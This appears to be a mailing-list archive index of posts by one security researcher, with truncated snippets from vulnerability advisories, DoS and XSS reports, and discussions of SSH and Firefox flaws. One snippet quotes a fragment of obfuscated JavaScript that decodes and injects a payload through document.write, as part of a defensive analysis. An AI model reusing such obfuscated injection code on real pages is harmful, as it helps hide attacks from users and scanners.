Re: Flaw in Firefox 2.0 RC2

On Tue, 17 Oct 2006, [EMAIL PROTECTED] wrote: http://lcamtuf.coredump.cx/ffoxdie.html this exploit still works with the latest Firefox 2.0 RC3 also caused FFox 1.5.0.7 on OS X i386 to die. jose nazario, ph.d. [EMAIL PROTECTED] http://monkey.org/~jose/http

Re: SSH attacks - anyone else seen these?

ch in part. ____ jose nazario, ph.d. http://monkey.org/~jose/

Re: what is this?

have some form of js obfuscation going on). i hope this helps. ____ jose nazario, ph.d. http://monkey.org/~jose/

Two Problems in IMP 2

supported by IMP, MSWordView Severity: Moderate -- anyone can view Word document attachments processed by IMP/MSWordView,users can fill up the disk and DoS the IMP server Author: Jose Nazario ([EMAIL PROTECTED]) Vendor Status: Contacted, fix

Crimelabs Paper: Passive System Fingerprinting using Network Client Applications

welcome. this was originally submitted to Summercon '01 in Amsterdam, but was not accepted. perhaps i'll shop it around after some further tweaking. the paper follows my .sig, ____ jose nazario[EMAIL PROTECTED] Passive System Fingerprinting using Netw

Re: SuSe / Debian man package format string vulnerability

you trick them into processing an untrusted and untrustworthy .mc file. ________ jose nazario [EMAIL PROTECTED] PGP: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80

SSHD-1 Logging Vulnerability

-1 Versions: At least ssh-1.2.27 and 1.2.30 Not Affected: OpenSSH Severity: Medium to High Author: Jose Nazario <[EMAIL PROTECTED]> Website: http://www.crimelabs.net/ Vendor Status: Contacted 1 February, 2001

Re: Multi format string bugs in IPAD x.x ftp server

y i don't have an IPAD box to test it on (care to share one?) but try that out. it's been the real problem before. ____ jose nazario [EMAIL PROTECTED] PGP: 89 B0 81 DA

Re: inetd DoS exploit

these features. at least the last time i looked at the code (eons ago) it did. 3] move to xinetd or other similar programs which have rate limiting. solar designer has a neat-o patch for xinetd that can do max-per-IP limits. very nice ... :) anyhow, old, mitigations are alreay in place, just le

Re: single-DES phase 1

t be available on the consumer market for some time. i'm just not comfortable with DES for the obvious reasons, and 3DES seems to have its occassional implementation problem, as well. (in the meantime i have been using OpenBSD IPSec VPNs with Blowfish encryption.)

Re: ssh environment - circumvention of restricted shells

http://www.heiho.net/bbs100/bbs_shell.txt hope that helps some people solve a part of this problem. i agree totally with markus, though, that the real issues are configuration errors. ___ jose nazario, ph.d. [EMAIL PROTECTED]

Re: VNC authentication weakness

i'm missing something, but why not pull a PRNG seed from /dev/random? _______ jose nazario, ph.d. [EMAIL PROTECTED] http://www.monkey.org/~jose/

Re: It takes two to tango

t of many recent discussion, including standards drafts. no excuses for not attempting to adhere to these best practices for either side of the issue. _______ jose nazario, ph.d. [EMAIL PROTECTED] http://www.monkey.org/~jose/

trillian DoS: trillian 1.0 pro also vulnerable

filter) identd on that host. enjoy. ___ jose nazario, ph.d. [EMAIL PROTECTED] http://www.monkey.org/~jose/

solaris 2.6, 7 yppasswd vulnerability

hanks. jose nazario [EMAIL PROTECTED] PGP: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80 PGP key ID 0xFD37F4E5 (pgp.mit.edu) Vulnerability R

Sun Security Bulletin #00203 (fwd) (yppasswd/ypbind)

available, they appear to be. thanks. ____ jose nazario [EMAIL PROTECTED] PGP: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80 PGP key ID 0xFD37F4E5 (pgp.mit.edu)

Re: remote DoS against inetd and ssh

ectivity and are vulnerable to this annoying DoS. sincerely, jose nazario[EMAIL PROTECTED] PGP 2.6.2 key fingerprint: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80 Public key available at http://biocserver.cwru.edu/~jose/pgp-key.asc

Re: Arbor Networks Peakflow SP web interface XSS

use the address secur...@arbor.net to establish communications. Arbor Networks take these reports very seriously and seeks to work with security researchers when possible to remedy any such issue. - jose nazario, ph.d

Re: Arbor Networks Peakflow SP web interface XSS

. - jose nazario, ph.d. manager of security researcharbor networks v: (734) 821 1427 http://asert.arbor.net/

Re: PHP security (or the lack thereof)

s that have had security bulletins over the years. i'm sure a few more languages could easily be added to that list. bear in mind i'm no PHP (or Perl, or C) bigot. but really, if you're going to complain about PHP, at least make your argument on reasonable grounds. jo

Re: BlackWorm naming confusing [CME entry now available]

On Tue, 24 Jan 2006, Gadi Evron wrote: > The CME entry should appear on their site shortly: > http://cme.mitre.org it already has, several days ago in fact: http://cme.mitre.org/data/list.html#24 ____ jose nazario, ph.d. [EMAIL PROTECTED] http://monkey.org

Re: Java script exploit

{w|=3D(t[x.charCodeAt(p++)-48])<>=3D8;s-=3D2}else{s=3D6}}document.write(r)}}dc('wfNDs5kfAsYOsLkoHSrcj0bqiRbvJGbvF96vK3Qqrzbq4h8aHukE3Ugc82waGEgDFUkoj9woifNDs5kfAMT'))"> jose nazario, ph.d. [EMAIL PROTECTED] http://monkey.org/~jose/http://infosecdaily.net/ http://www.wormblog.com/

Re: Java script exploit

fuscated) this is what your browser would see and load. unless your spam/scam detection engine also ran the javascript, it wouldn't see that. hence, obfuscation. hopefully this helps people out there decode questionable javasript in the future. jose nazario, ph.d.

Re; FreeBSD Security Advisory FreeBSD-SA-06:13.sendmail

he FTP server to be read. jose nazario, ph.d. [EMAIL PROTECTED] http://monkey.org/~jose/http://infosecdaily.net/ http://www.wormblog.com/